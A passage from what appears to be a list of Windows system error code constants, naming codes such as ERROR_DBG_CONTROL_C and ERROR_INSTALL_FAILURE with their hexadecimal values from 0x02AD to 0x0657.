ERROR_REGISTRY_HIVE_RECOVERED = 0x02AD + ERROR_DLL_MIGHT_BE_INSECURE = 0x02AE + ERROR_DLL_MIGHT_BE_INCOMPATIBLE = 0x02AF + ERROR_DBG_EXCEPTION_NOT_HANDLED = 0x02B0 + ERROR_DBG_REPLY_LATER = 0x02B1 + ERROR_DBG_UNABLE_TO_PROVIDE_HANDLE = 0x02B2 + ERROR_DBG_TERMINATE_THREAD = 0x02B3 + ERROR_DBG_TERMINATE_PROCESS = 0x02B4 + ERROR_DBG_CONTROL_C = 0x02B5 + ERROR_DBG_PRINTEXCEPTION_C = 0x02B6 + ERROR_DBG_RIPEXCEPTION = 0x02B7 + ERROR_DBG_CONTROL_BREAK = 0x02B8 + ERROR_DBG_COMMAND_EXCEPTION = 0x02B9 + ERROR_OBJECT_NAME_EXISTS = 0x02BA + ERROR_THREAD_WAS_SUSPENDED = 0x02BB + ERROR_IMAGE_NOT_AT_BASE = 0x02BC + ERROR_RXACT_STATE_CREATED = 0x02BD + ERROR_SEGMENT_NOTIFICATION = 0x02BE + ERROR_BAD_CURRENT_DIRECTORY = 0x02BF + ERROR_FT_READ_RECOVERY_FROM_BACKUP = 0x02C0 + ERROR_FT_WRITE_RECOVERY = 0x02C1 + ERROR_IMAGE_MACHINE_TYPE_MISMATCH = 0x02C2 + ERROR_RECEIVE_PARTIAL = 0x02C3 + ERROR_RECEIVE_EXPEDITED = 0x02C4 + ERROR_RECEIVE_PARTIAL_EXPEDITED = 0x02C5 + ERROR_EVENT_DONE = 0x02C6 + ERROR_EVENT_PENDING = 0x02C7 + ERROR_CHECKING_FILE_SYSTEM = 0x02C8 + ERROR_FATAL_APP_EXIT = 0x02C9 + ERROR_PREDEFINED_HANDLE = 0x02CA + ERROR_WAS_UNLOCKED = 0x02CB + ERROR_SERVICE_NOTIFICATION = 0x02CC + ERROR_WAS_LOCKED = 0x02CD + ERROR_LOG_HARD_ERROR = 0x02CE + ERROR_ALREADY_WIN32 = 0x02CF + ERROR_IMAGE_MACHINE_TYPE_MISMATCH_EXE = 0x02D0 + ERROR_NO_YIELD_PERFORMED = 0x02D1 + ERROR_TIMER_RESUME_IGNORED = 0x02D2 + ERROR_ARBITRATION_UNHANDLED = 0x02D3 + ERROR_CARDBUS_NOT_SUPPORTED = 0x02D4 + ERROR_MP_PROCESSOR_MISMATCH = 0x02D5 + ERROR_HIBERNATED = 0x02D6 + ERROR_RESUME_HIBERNATION = 0x02D7 + ERROR_FIRMWARE_UPDATED = 0x02D8 + ERROR_DRIVERS_LEAKING_LOCKED_PAGES = 0x02D9 + ERROR_WAKE_SYSTEM = 0x02DA + ERROR_WAIT_1 = 0x02DB + ERROR_WAIT_2 = 0x02DC + ERROR_WAIT_3 = 0x02DD + ERROR_WAIT_63 = 0x02DE + ERROR_ABANDONED_WAIT_0 = 0x02DF + ERROR_ABANDONED_WAIT_63 = 0x02E0 + ERROR_USER_APC = 0x02E1 + ERROR_KERNEL_APC = 0x02E2 + ERROR_ALERTED = 0x02E3 + ERROR_ELEVATION_REQUIRED = 0x02E4 + ERROR_REPARSE = 0x02E5 + ERROR_OPLOCK_BREAK_IN_PROGRESS = 0x02E6 + ERROR_VOLUME_MOUNTED = 0x02E7 + ERROR_RXACT_COMMITTED = 0x02E8 + ERROR_NOTIFY_CLEANUP = 0x02E9 + ERROR_PRIMARY_TRANSPORT_CONNECT_FAILED = 0x02EA + ERROR_PAGE_FAULT_TRANSITION = 0x02EB + ERROR_PAGE_FAULT_DEMAND_ZERO = 0x02EC + ERROR_PAGE_FAULT_COPY_ON_WRITE = 0x02ED + ERROR_PAGE_FAULT_GUARD_PAGE = 0x02EE + ERROR_PAGE_FAULT_PAGING_FILE = 0x02EF + ERROR_CACHE_PAGE_LOCKED = 0x02F0 + ERROR_CRASH_DUMP = 0x02F1 + ERROR_BUFFER_ALL_ZEROS = 0x02F2 + ERROR_REPARSE_OBJECT = 0x02F3 + ERROR_RESOURCE_REQUIREMENTS_CHANGED = 0x02F4 + ERROR_TRANSLATION_COMPLETE = 0x02F5 + ERROR_NOTHING_TO_TERMINATE = 0x02F6 + ERROR_PROCESS_NOT_IN_JOB = 0x02F7 + ERROR_PROCESS_IN_JOB = 0x02F8 + ERROR_VOLSNAP_HIBERNATE_READY = 0x02F9 + ERROR_FSFILTER_OP_COMPLETED_SUCCESSFULLY = 0x02FA + ERROR_INTERRUPT_VECTOR_ALREADY_CONNECTED = 0x02FB + ERROR_INTERRUPT_STILL_CONNECTED = 0x02FC + ERROR_WAIT_FOR_OPLOCK = 0x02FD + ERROR_DBG_EXCEPTION_HANDLED = 0x02FE + ERROR_DBG_CONTINUE = 0x02FF + ERROR_CALLBACK_POP_STACK = 0x0300 + ERROR_COMPRESSION_DISABLED = 0x0301 + ERROR_CANTFETCHBACKWARDS = 0x0302 + ERROR_CANTSCROLLBACKWARDS = 0x0303 + ERROR_ROWSNOTRELEASED = 0x0304 + ERROR_BAD_ACCESSOR_FLAGS = 0x0305 + ERROR_ERRORS_ENCOUNTERED = 0x0306 + ERROR_NOT_CAPABLE = 0x0307 + ERROR_REQUEST_OUT_OF_SEQUENCE = 0x0308 + ERROR_VERSION_PARSE_ERROR = 0x0309 + ERROR_BADSTARTPOSITION = 0x030A + ERROR_MEMORY_HARDWARE = 0x030B + ERROR_DISK_REPAIR_DISABLED = 0x030C + ERROR_INSUFFICIENT_RESOURCE_FOR_SPECIFIED_SHARED_SECTION_SIZE = 0x030D + ERROR_SYSTEM_POWERSTATE_TRANSITION = 0x030E + ERROR_SYSTEM_POWERSTATE_COMPLEX_TRANSITION = 0x030F + ERROR_MCA_EXCEPTION = 0x0310 + ERROR_ACCESS_AUDIT_BY_POLICY = 0x0311 + ERROR_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY = 0x0312 + ERROR_ABANDON_HIBERFILE = 0x0313 + ERROR_LOST_WRITEBEHIND_DATA_NETWORK_DISCONNECTED = 0x0314 + ERROR_LOST_WRITEBEHIND_DATA_NETWORK_SERVER_ERROR = 0x0315 + ERROR_LOST_WRITEBEHIND_DATA_LOCAL_DISK_ERROR = 0x0316 + ERROR_BAD_MCFG_TABLE = 0x0317 + ERROR_OPLOCK_SWITCHED_TO_NEW_HANDLE = 0x0320 + ERROR_CANNOT_GRANT_REQUESTED_OPLOCK = 0x0321 + ERROR_CANNOT_BREAK_OPLOCK = 0x0322 + ERROR_OPLOCK_HANDLE_CLOSED = 0x0323 + ERROR_NO_ACE_CONDITION = 0x0324 + ERROR_INVALID_ACE_CONDITION = 0x0325 + ERROR_EA_ACCESS_DENIED = 0x03E2 + ERROR_OPERATION_ABORTED = 0x03E3 + ERROR_IO_INCOMPLETE = 0x03E4 + ERROR_IO_PENDING = 0x03E5 + ERROR_NOACCESS = 0x03E6 + ERROR_SWAPERROR = 0x03E7 + ERROR_STACK_OVERFLOW = 0x03E9 + ERROR_INVALID_MESSAGE = 0x03EA + ERROR_CAN_NOT_COMPLETE = 0x03EB + ERROR_INVALID_FLAGS = 0x03EC + ERROR_UNRECOGNIZED_VOLUME = 0x03ED + ERROR_FILE_INVALID = 0x03EE + ERROR_FULLSCREEN_MODE = 0x03EF + ERROR_NO_TOKEN = 0x03F0 + ERROR_BADDB = 0x03F1 + ERROR_BADKEY = 0x03F2 + ERROR_CANTOPEN = 0x03F3 + ERROR_CANTREAD = 0x03F4 + ERROR_CANTWRITE = 0x03F5 + ERROR_REGISTRY_RECOVERED = 0x03F6 + ERROR_REGISTRY_CORRUPT = 0x03F7 + ERROR_REGISTRY_IO_FAILED = 0x03F8 + ERROR_NOT_REGISTRY_FILE = 0x03F9 + ERROR_KEY_DELETED = 0x03FA + ERROR_NO_LOG_SPACE = 0x03FB + ERROR_KEY_HAS_CHILDREN = 0x03FC + ERROR_CHILD_MUST_BE_VOLATILE = 0x03FD + ERROR_NOTIFY_ENUM_DIR = 0x03FE + ERROR_DEPENDENT_SERVICES_RUNNING = 0x041B + ERROR_INVALID_SERVICE_CONTROL = 0x041C + ERROR_SERVICE_REQUEST_TIMEOUT = 0x041D + ERROR_SERVICE_NO_THREAD = 0x041E + ERROR_SERVICE_DATABASE_LOCKED = 0x041F + ERROR_SERVICE_ALREADY_RUNNING = 0x0420 + ERROR_INVALID_SERVICE_ACCOUNT = 0x0421 + ERROR_SERVICE_DISABLED = 0x0422 + ERROR_CIRCULAR_DEPENDENCY = 0x0423 + ERROR_SERVICE_DOES_NOT_EXIST = 0x0424 + ERROR_SERVICE_CANNOT_ACCEPT_CTRL = 0x0425 + ERROR_SERVICE_NOT_ACTIVE = 0x0426 + ERROR_FAILED_SERVICE_CONTROLLER_CONNECT = 0x0427 + ERROR_EXCEPTION_IN_SERVICE = 0x0428 + ERROR_DATABASE_DOES_NOT_EXIST = 0x0429 + ERROR_SERVICE_SPECIFIC_ERROR = 0x042A + ERROR_PROCESS_ABORTED = 0x042B + ERROR_SERVICE_DEPENDENCY_FAIL = 0x042C + ERROR_SERVICE_LOGON_FAILED = 0x042D + ERROR_SERVICE_START_HANG = 0x042E + ERROR_INVALID_SERVICE_LOCK = 0x042F + ERROR_SERVICE_MARKED_FOR_DELETE = 0x0430 + ERROR_SERVICE_EXISTS = 0x0431 + ERROR_ALREADY_RUNNING_LKG = 0x0432 + ERROR_SERVICE_DEPENDENCY_DELETED = 0x0433 + ERROR_BOOT_ALREADY_ACCEPTED = 0x0434 + ERROR_SERVICE_NEVER_STARTED = 0x0435 + ERROR_DUPLICATE_SERVICE_NAME = 0x0436 + ERROR_DIFFERENT_SERVICE_ACCOUNT = 0x0437 + ERROR_CANNOT_DETECT_DRIVER_FAILURE = 0x0438 + ERROR_CANNOT_DETECT_PROCESS_ABORT = 0x0439 + ERROR_NO_RECOVERY_PROGRAM = 0x043A + ERROR_SERVICE_NOT_IN_EXE = 0x043B + ERROR_NOT_SAFEBOOT_SERVICE = 0x043C + ERROR_END_OF_MEDIA = 0x044C + ERROR_FILEMARK_DETECTED = 0x044D + ERROR_BEGINNING_OF_MEDIA = 0x044E + ERROR_SETMARK_DETECTED = 0x044F + ERROR_NO_DATA_DETECTED = 0x0450 + ERROR_PARTITION_FAILURE = 0x0451 + ERROR_INVALID_BLOCK_LENGTH = 0x0452 + ERROR_DEVICE_NOT_PARTITIONED = 0x0453 + ERROR_UNABLE_TO_LOCK_MEDIA = 0x0454 + ERROR_UNABLE_TO_UNLOAD_MEDIA = 0x0455 + ERROR_MEDIA_CHANGED = 0x0456 + ERROR_BUS_RESET = 0x0457 + ERROR_NO_MEDIA_IN_DRIVE = 0x0458 + ERROR_NO_UNICODE_TRANSLATION = 0x0459 + ERROR_DLL_INIT_FAILED = 0x045A + ERROR_SHUTDOWN_IN_PROGRESS = 0x045B + ERROR_NO_SHUTDOWN_IN_PROGRESS = 0x045C + ERROR_IO_DEVICE = 0x045D + ERROR_SERIAL_NO_DEVICE = 0x045E + ERROR_IRQ_BUSY = 0x045F + ERROR_MORE_WRITES = 0x0460 + ERROR_COUNTER_TIMEOUT = 0x0461 + ERROR_FLOPPY_ID_MARK_NOT_FOUND = 0x0462 + ERROR_FLOPPY_WRONG_CYLINDER = 0x0463 + ERROR_FLOPPY_UNKNOWN_ERROR = 0x0464 + ERROR_FLOPPY_BAD_REGISTERS = 0x0465 + ERROR_DISK_RECALIBRATE_FAILED = 0x0466 + ERROR_DISK_OPERATION_FAILED = 0x0467 + ERROR_DISK_RESET_FAILED = 0x0468 + ERROR_EOM_OVERFLOW = 0x0469 + ERROR_NOT_ENOUGH_SERVER_MEMORY = 0x046A + ERROR_POSSIBLE_DEADLOCK = 0x046B + ERROR_MAPPED_ALIGNMENT = 0x046C + ERROR_SET_POWER_STATE_VETOED = 0x0474 + ERROR_SET_POWER_STATE_FAILED = 0x0475 + ERROR_TOO_MANY_LINKS = 0x0476 + ERROR_OLD_WIN_VERSION = 0x047E + ERROR_APP_WRONG_OS = 0x047F + ERROR_SINGLE_INSTANCE_APP = 0x0480 + ERROR_RMODE_APP = 0x0481 + ERROR_INVALID_DLL = 0x0482 + ERROR_NO_ASSOCIATION = 0x0483 + ERROR_DDE_FAIL = 0x0484 + ERROR_DLL_NOT_FOUND = 0x0485 + ERROR_NO_MORE_USER_HANDLES = 0x0486 + ERROR_MESSAGE_SYNC_ONLY = 0x0487 + ERROR_SOURCE_ELEMENT_EMPTY = 0x0488 + ERROR_DESTINATION_ELEMENT_FULL = 0x0489 + ERROR_ILLEGAL_ELEMENT_ADDRESS = 0x048A + ERROR_MAGAZINE_NOT_PRESENT = 0x048B + ERROR_DEVICE_REINITIALIZATION_NEEDED = 0x048C + ERROR_DEVICE_REQUIRES_CLEANING = 0x048D + ERROR_DEVICE_DOOR_OPEN = 0x048E + ERROR_DEVICE_NOT_CONNECTED = 0x048F + ERROR_NOT_FOUND = 0x0490 + ERROR_NO_MATCH = 0x0491 + ERROR_SET_NOT_FOUND = 0x0492 + ERROR_POINT_NOT_FOUND = 0x0493 + ERROR_NO_TRACKING_SERVICE = 0x0494 + ERROR_NO_VOLUME_ID = 0x0495 + ERROR_UNABLE_TO_REMOVE_REPLACED = 0x0497 + ERROR_UNABLE_TO_MOVE_REPLACEMENT = 0x0498 + ERROR_UNABLE_TO_MOVE_REPLACEMENT_2 = 0x0499 + ERROR_JOURNAL_DELETE_IN_PROGRESS = 0x049A + ERROR_JOURNAL_NOT_ACTIVE = 0x049B + ERROR_POTENTIAL_FILE_FOUND = 0x049C + ERROR_JOURNAL_ENTRY_DELETED = 0x049D + ERROR_SHUTDOWN_IS_SCHEDULED = 0x04A6 + ERROR_SHUTDOWN_USERS_LOGGED_ON = 0x04A7 + ERROR_BAD_DEVICE = 0x04B0 + ERROR_CONNECTION_UNAVAIL = 0x04B1 + ERROR_DEVICE_ALREADY_REMEMBERED = 0x04B2 + ERROR_NO_NET_OR_BAD_PATH = 0x04B3 + ERROR_BAD_PROVIDER = 0x04B4 + ERROR_CANNOT_OPEN_PROFILE = 0x04B5 + ERROR_BAD_PROFILE = 0x04B6 + ERROR_NOT_CONTAINER = 0x04B7 + ERROR_EXTENDED_ERROR = 0x04B8 + ERROR_INVALID_GROUPNAME = 0x04B9 + ERROR_INVALID_COMPUTERNAME = 0x04BA + ERROR_INVALID_EVENTNAME = 0x04BB + ERROR_INVALID_DOMAINNAME = 0x04BC + ERROR_INVALID_SERVICENAME = 0x04BD + ERROR_INVALID_NETNAME = 0x04BE + ERROR_INVALID_SHARENAME = 0x04BF + ERROR_INVALID_PASSWORDNAME = 0x04C0 + ERROR_INVALID_MESSAGENAME = 0x04C1 + ERROR_INVALID_MESSAGEDEST = 0x04C2 + ERROR_SESSION_CREDENTIAL_CONFLICT = 0x04C3 + ERROR_REMOTE_SESSION_LIMIT_EXCEEDED = 0x04C4 + ERROR_DUP_DOMAINNAME = 0x04C5 + ERROR_NO_NETWORK = 0x04C6 + ERROR_CANCELLED = 0x04C7 + ERROR_USER_MAPPED_FILE = 0x04C8 + ERROR_CONNECTION_REFUSED = 0x04C9 + ERROR_GRACEFUL_DISCONNECT = 0x04CA + ERROR_ADDRESS_ALREADY_ASSOCIATED = 0x04CB + ERROR_ADDRESS_NOT_ASSOCIATED = 0x04CC + ERROR_CONNECTION_INVALID = 0x04CD + ERROR_CONNECTION_ACTIVE = 0x04CE + ERROR_NETWORK_UNREACHABLE = 0x04CF + ERROR_HOST_UNREACHABLE = 0x04D0 + ERROR_PROTOCOL_UNREACHABLE = 0x04D1 + ERROR_PORT_UNREACHABLE = 0x04D2 + ERROR_REQUEST_ABORTED = 0x04D3 + ERROR_CONNECTION_ABORTED = 0x04D4 + ERROR_RETRY = 0x04D5 + ERROR_CONNECTION_COUNT_LIMIT = 0x04D6 + ERROR_LOGIN_TIME_RESTRICTION = 0x04D7 + ERROR_LOGIN_WKSTA_RESTRICTION = 0x04D8 + ERROR_INCORRECT_ADDRESS = 0x04D9 + ERROR_ALREADY_REGISTERED = 0x04DA + ERROR_SERVICE_NOT_FOUND = 0x04DB + ERROR_NOT_AUTHENTICATED = 0x04DC + ERROR_NOT_LOGGED_ON = 0x04DD + ERROR_CONTINUE = 0x04DE + ERROR_ALREADY_INITIALIZED = 0x04DF + ERROR_NO_MORE_DEVICES = 0x04E0 + ERROR_NO_SUCH_SITE = 0x04E1 + ERROR_DOMAIN_CONTROLLER_EXISTS = 0x04E2 + ERROR_ONLY_IF_CONNECTED = 0x04E3 + ERROR_OVERRIDE_NOCHANGES = 0x04E4 + ERROR_BAD_USER_PROFILE = 0x04E5 + ERROR_NOT_SUPPORTED_ON_SBS = 0x04E6 + ERROR_SERVER_SHUTDOWN_IN_PROGRESS = 0x04E7 + ERROR_HOST_DOWN = 0x04E8 + ERROR_NON_ACCOUNT_SID = 0x04E9 + ERROR_NON_DOMAIN_SID = 0x04EA + ERROR_APPHELP_BLOCK = 0x04EB + ERROR_ACCESS_DISABLED_BY_POLICY = 0x04EC + ERROR_REG_NAT_CONSUMPTION = 0x04ED + ERROR_CSCSHARE_OFFLINE = 0x04EE + ERROR_PKINIT_FAILURE = 0x04EF + ERROR_SMARTCARD_SUBSYSTEM_FAILURE = 0x04F0 + ERROR_DOWNGRADE_DETECTED = 0x04F1 + ERROR_MACHINE_LOCKED = 0x04F7 + ERROR_CALLBACK_SUPPLIED_INVALID_DATA = 0x04F9 + ERROR_SYNC_FOREGROUND_REFRESH_REQUIRED = 0x04FA + ERROR_DRIVER_BLOCKED = 0x04FB + ERROR_INVALID_IMPORT_OF_NON_DLL = 0x04FC + ERROR_ACCESS_DISABLED_WEBBLADE = 0x04FD + ERROR_ACCESS_DISABLED_WEBBLADE_TAMPER = 0x04FE + ERROR_RECOVERY_FAILURE = 0x04FF + ERROR_ALREADY_FIBER = 0x0500 + ERROR_ALREADY_THREAD = 0x0501 + ERROR_STACK_BUFFER_OVERRUN = 0x0502 + ERROR_PARAMETER_QUOTA_EXCEEDED = 0x0503 + ERROR_DEBUGGER_INACTIVE = 0x0504 + ERROR_DELAY_LOAD_FAILED = 0x0505 + ERROR_VDM_DISALLOWED = 0x0506 + ERROR_UNIDENTIFIED_ERROR = 0x0507 + ERROR_INVALID_CRUNTIME_PARAMETER = 0x0508 + ERROR_BEYOND_VDL = 0x0509 + ERROR_INCOMPATIBLE_SERVICE_SID_TYPE = 0x050A + ERROR_DRIVER_PROCESS_TERMINATED = 0x050B + ERROR_IMPLEMENTATION_LIMIT = 0x050C + ERROR_PROCESS_IS_PROTECTED = 0x050D + ERROR_SERVICE_NOTIFY_CLIENT_LAGGING = 0x050E + ERROR_DISK_QUOTA_EXCEEDED = 0x050F + ERROR_CONTENT_BLOCKED = 0x0510 + ERROR_INCOMPATIBLE_SERVICE_PRIVILEGE = 0x0511 + ERROR_INVALID_LABEL = 0x0513 + ERROR_NOT_ALL_ASSIGNED = 0x0514 + ERROR_SOME_NOT_MAPPED = 0x0515 + ERROR_NO_QUOTAS_FOR_ACCOUNT = 0x0516 + ERROR_LOCAL_USER_SESSION_KEY = 0x0517 + ERROR_NULL_LM_PASSWORD = 0x0518 + ERROR_UNKNOWN_REVISION = 0x0519 + ERROR_REVISION_MISMATCH = 0x051A + ERROR_INVALID_OWNER = 0x051B + ERROR_INVALID_PRIMARY_GROUP = 0x051C + ERROR_NO_IMPERSONATION_TOKEN = 0x051D + ERROR_CANT_DISABLE_MANDATORY = 0x051E + ERROR_NO_LOGON_SERVERS = 0x051F + ERROR_NO_SUCH_LOGON_SESSION = 0x0520 + ERROR_NO_SUCH_PRIVILEGE = 0x0521 + ERROR_PRIVILEGE_NOT_HELD = 0x0522 + ERROR_INVALID_ACCOUNT_NAME = 0x0523 + ERROR_USER_EXISTS = 0x0524 + ERROR_NO_SUCH_USER = 0x0525 + ERROR_GROUP_EXISTS = 0x0526 + ERROR_NO_SUCH_GROUP = 0x0527 + ERROR_MEMBER_IN_GROUP = 0x0528 + ERROR_MEMBER_NOT_IN_GROUP = 0x0529 + ERROR_LAST_ADMIN = 0x052A + ERROR_WRONG_PASSWORD = 0x052B + ERROR_ILL_FORMED_PASSWORD = 0x052C + ERROR_PASSWORD_RESTRICTION = 0x052D + ERROR_LOGON_FAILURE = 0x052E + ERROR_ACCOUNT_RESTRICTION = 0x052F + ERROR_INVALID_LOGON_HOURS = 0x0530 + ERROR_INVALID_WORKSTATION = 0x0531 + ERROR_PASSWORD_EXPIRED = 0x0532 + ERROR_ACCOUNT_DISABLED = 0x0533 + ERROR_NONE_MAPPED = 0x0534 + ERROR_TOO_MANY_LUIDS_REQUESTED = 0x0535 + ERROR_LUIDS_EXHAUSTED = 0x0536 + ERROR_INVALID_SUB_AUTHORITY = 0x0537 + ERROR_INVALID_ACL = 0x0538 + ERROR_INVALID_SID = 0x0539 + ERROR_INVALID_SECURITY_DESCR = 0x053A + ERROR_BAD_INHERITANCE_ACL = 0x053C + ERROR_SERVER_DISABLED = 0x053D + ERROR_SERVER_NOT_DISABLED = 0x053E + ERROR_INVALID_ID_AUTHORITY = 0x053F + ERROR_ALLOTTED_SPACE_EXCEEDED = 0x0540 + ERROR_INVALID_GROUP_ATTRIBUTES = 0x0541 + ERROR_BAD_IMPERSONATION_LEVEL = 0x0542 + ERROR_CANT_OPEN_ANONYMOUS = 0x0543 + ERROR_BAD_VALIDATION_CLASS = 0x0544 + ERROR_BAD_TOKEN_TYPE = 0x0545 + ERROR_NO_SECURITY_ON_OBJECT = 0x0546 + ERROR_CANT_ACCESS_DOMAIN_INFO = 0x0547 + ERROR_INVALID_SERVER_STATE = 0x0548 + ERROR_INVALID_DOMAIN_STATE = 0x0549 + ERROR_INVALID_DOMAIN_ROLE = 0x054A + ERROR_NO_SUCH_DOMAIN = 0x054B + ERROR_DOMAIN_EXISTS = 0x054C + ERROR_DOMAIN_LIMIT_EXCEEDED = 0x054D + ERROR_INTERNAL_DB_CORRUPTION = 0x054E + ERROR_INTERNAL_ERROR = 0x054F + ERROR_GENERIC_NOT_MAPPED = 0x0550 + ERROR_BAD_DESCRIPTOR_FORMAT = 0x0551 + ERROR_NOT_LOGON_PROCESS = 0x0552 + ERROR_LOGON_SESSION_EXISTS = 0x0553 + ERROR_NO_SUCH_PACKAGE = 0x0554 + ERROR_BAD_LOGON_SESSION_STATE = 0x0555 + ERROR_LOGON_SESSION_COLLISION = 0x0556 + ERROR_INVALID_LOGON_TYPE = 0x0557 + ERROR_CANNOT_IMPERSONATE = 0x0558 + ERROR_RXACT_INVALID_STATE = 0x0559 + ERROR_RXACT_COMMIT_FAILURE = 0x055A + ERROR_SPECIAL_ACCOUNT = 0x055B + ERROR_SPECIAL_GROUP = 0x055C + ERROR_SPECIAL_USER = 0x055D + ERROR_MEMBERS_PRIMARY_GROUP = 0x055E + ERROR_TOKEN_ALREADY_IN_USE = 0x055F + ERROR_NO_SUCH_ALIAS = 0x0560 + ERROR_MEMBER_NOT_IN_ALIAS = 0x0561 + ERROR_MEMBER_IN_ALIAS = 0x0562 + ERROR_ALIAS_EXISTS = 0x0563 + ERROR_LOGON_NOT_GRANTED = 0x0564 + ERROR_TOO_MANY_SECRETS = 0x0565 + ERROR_SECRET_TOO_LONG = 0x0566 + ERROR_INTERNAL_DB_ERROR = 0x0567 + ERROR_TOO_MANY_CONTEXT_IDS = 0x0568 + ERROR_LOGON_TYPE_NOT_GRANTED = 0x0569 + ERROR_NT_CROSS_ENCRYPTION_REQUIRED = 0x056A + ERROR_NO_SUCH_MEMBER = 0x056B + ERROR_INVALID_MEMBER = 0x056C + ERROR_TOO_MANY_SIDS = 0x056D + ERROR_LM_CROSS_ENCRYPTION_REQUIRED = 0x056E + ERROR_NO_INHERITANCE = 0x056F + ERROR_FILE_CORRUPT = 0x0570 + ERROR_DISK_CORRUPT = 0x0571 + ERROR_NO_USER_SESSION_KEY = 0x0572 + ERROR_LICENSE_QUOTA_EXCEEDED = 0x0573 + ERROR_WRONG_TARGET_NAME = 0x0574 + ERROR_MUTUAL_AUTH_FAILED = 0x0575 + ERROR_TIME_SKEW = 0x0576 + ERROR_CURRENT_DOMAIN_NOT_ALLOWED = 0x0577 + ERROR_INVALID_WINDOW_HANDLE = 0x0578 + ERROR_INVALID_MENU_HANDLE = 0x0579 + ERROR_INVALID_CURSOR_HANDLE = 0x057A + ERROR_INVALID_ACCEL_HANDLE = 0x057B + ERROR_INVALID_HOOK_HANDLE = 0x057C + ERROR_INVALID_DWP_HANDLE = 0x057D + ERROR_TLW_WITH_WSCHILD = 0x057E + ERROR_CANNOT_FIND_WND_CLASS = 0x057F + ERROR_WINDOW_OF_OTHER_THREAD = 0x0580 + ERROR_HOTKEY_ALREADY_REGISTERED = 0x0581 + ERROR_CLASS_ALREADY_EXISTS = 0x0582 + ERROR_CLASS_DOES_NOT_EXIST = 0x0583 + ERROR_CLASS_HAS_WINDOWS = 0x0584 + ERROR_INVALID_INDEX = 0x0585 + ERROR_INVALID_ICON_HANDLE = 0x0586 + ERROR_PRIVATE_DIALOG_INDEX = 0x0587 + ERROR_LISTBOX_ID_NOT_FOUND = 0x0588 + ERROR_NO_WILDCARD_CHARACTERS = 0x0589 + ERROR_CLIPBOARD_NOT_OPEN = 0x058A + ERROR_HOTKEY_NOT_REGISTERED = 0x058B + ERROR_WINDOW_NOT_DIALOG = 0x058C + ERROR_CONTROL_ID_NOT_FOUND = 0x058D + ERROR_INVALID_COMBOBOX_MESSAGE = 0x058E + ERROR_WINDOW_NOT_COMBOBOX = 0x058F + ERROR_INVALID_EDIT_HEIGHT = 0x0590 + ERROR_DC_NOT_FOUND = 0x0591 + ERROR_INVALID_HOOK_FILTER = 0x0592 + ERROR_INVALID_FILTER_PROC = 0x0593 + ERROR_HOOK_NEEDS_HMOD = 0x0594 + ERROR_GLOBAL_ONLY_HOOK = 0x0595 + ERROR_JOURNAL_HOOK_SET = 0x0596 + ERROR_HOOK_NOT_INSTALLED = 0x0597 + ERROR_INVALID_LB_MESSAGE = 0x0598 + ERROR_SETCOUNT_ON_BAD_LB = 0x0599 + ERROR_LB_WITHOUT_TABSTOPS = 0x059A + ERROR_DESTROY_OBJECT_OF_OTHER_THREAD = 0x059B + ERROR_CHILD_WINDOW_MENU = 0x059C + ERROR_NO_SYSTEM_MENU = 0x059D + ERROR_INVALID_MSGBOX_STYLE = 0x059E + ERROR_INVALID_SPI_VALUE = 0x059F + ERROR_SCREEN_ALREADY_LOCKED = 0x05A0 + ERROR_HWNDS_HAVE_DIFF_PARENT = 0x05A1 + ERROR_NOT_CHILD_WINDOW = 0x05A2 + ERROR_INVALID_GW_COMMAND = 0x05A3 + ERROR_INVALID_THREAD_ID = 0x05A4 + ERROR_NON_MDICHILD_WINDOW = 0x05A5 + ERROR_POPUP_ALREADY_ACTIVE = 0x05A6 + ERROR_NO_SCROLLBARS = 0x05A7 + ERROR_INVALID_SCROLLBAR_RANGE = 0x05A8 + ERROR_INVALID_SHOWWIN_COMMAND = 0x05A9 + ERROR_NO_SYSTEM_RESOURCES = 0x05AA + ERROR_NONPAGED_SYSTEM_RESOURCES = 0x05AB + ERROR_PAGED_SYSTEM_RESOURCES = 0x05AC + ERROR_WORKING_SET_QUOTA = 0x05AD + ERROR_PAGEFILE_QUOTA = 0x05AE + ERROR_COMMITMENT_LIMIT = 0x05AF + ERROR_MENU_ITEM_NOT_FOUND = 0x05B0 + ERROR_INVALID_KEYBOARD_HANDLE = 0x05B1 + ERROR_HOOK_TYPE_NOT_ALLOWED = 0x05B2 + ERROR_REQUIRES_INTERACTIVE_WINDOWSTATION = 0x05B3 + ERROR_TIMEOUT = 0x05B4 + ERROR_INVALID_MONITOR_HANDLE = 0x05B5 + ERROR_INCORRECT_SIZE = 0x05B6 + ERROR_SYMLINK_CLASS_DISABLED = 0x05B7 + ERROR_SYMLINK_NOT_SUPPORTED = 0x05B8 + ERROR_XML_PARSE_ERROR = 0x05B9 + ERROR_XMLDSIG_ERROR = 0x05BA + ERROR_RESTART_APPLICATION = 0x05BB + ERROR_WRONG_COMPARTMENT = 0x05BC + ERROR_AUTHIP_FAILURE = 0x05BD + ERROR_NO_NVRAM_RESOURCES = 0x05BE + ERROR_EVENTLOG_FILE_CORRUPT = 0x05DC + ERROR_EVENTLOG_CANT_START = 0x05DD + ERROR_LOG_FILE_FULL = 0x05DE + ERROR_EVENTLOG_FILE_CHANGED = 0x05DF + ERROR_INVALID_TASK_NAME = 0x060E + ERROR_INVALID_TASK_INDEX = 0x060F + ERROR_THREAD_ALREADY_IN_TASK = 0x0610 + ERROR_INSTALL_SERVICE_FAILURE = 0x0641 + ERROR_INSTALL_USEREXIT = 0x0642 + ERROR_INSTALL_FAILURE = 0x0643 + ERROR_INSTALL_SUSPEND = 0x0644 + ERROR_UNKNOWN_PRODUCT = 0x0645 + ERROR_UNKNOWN_FEATURE = 0x0646 + ERROR_UNKNOWN_COMPONENT = 0x0647 + ERROR_UNKNOWN_PROPERTY = 0x0648 + ERROR_INVALID_HANDLE_STATE = 0x0649 + ERROR_BAD_CONFIGURATION = 0x064A + ERROR_INDEX_ABSENT = 0x064B + ERROR_INSTALL_SOURCE_ABSENT = 0x064C + ERROR_INSTALL_PACKAGE_VERSION = 0x064D + ERROR_PRODUCT_UNINSTALLED = 0x064E + ERROR_BAD_QUERY_SYNTAX = 0x064F + ERROR_INVALID_FIELD = 0x0650 + ERROR_DEVICE_REMOVED = 0x0651 + ERROR_INSTALL_ALREADY_RUNNING = 0x0652 + ERROR_INSTALL_PACKAGE_OPEN_FAILED = 0x0653 + ERROR_INSTALL_PACKAGE_INVALID = 0x0654 + ERROR_INSTALL_UI_FAILURE = 0x0655 + ERROR_INSTALL_LOG_FAILURE = 0x0656 + ERROR_INSTALL_LANGUAGE_UNSUPPORTED = 0x0657 + 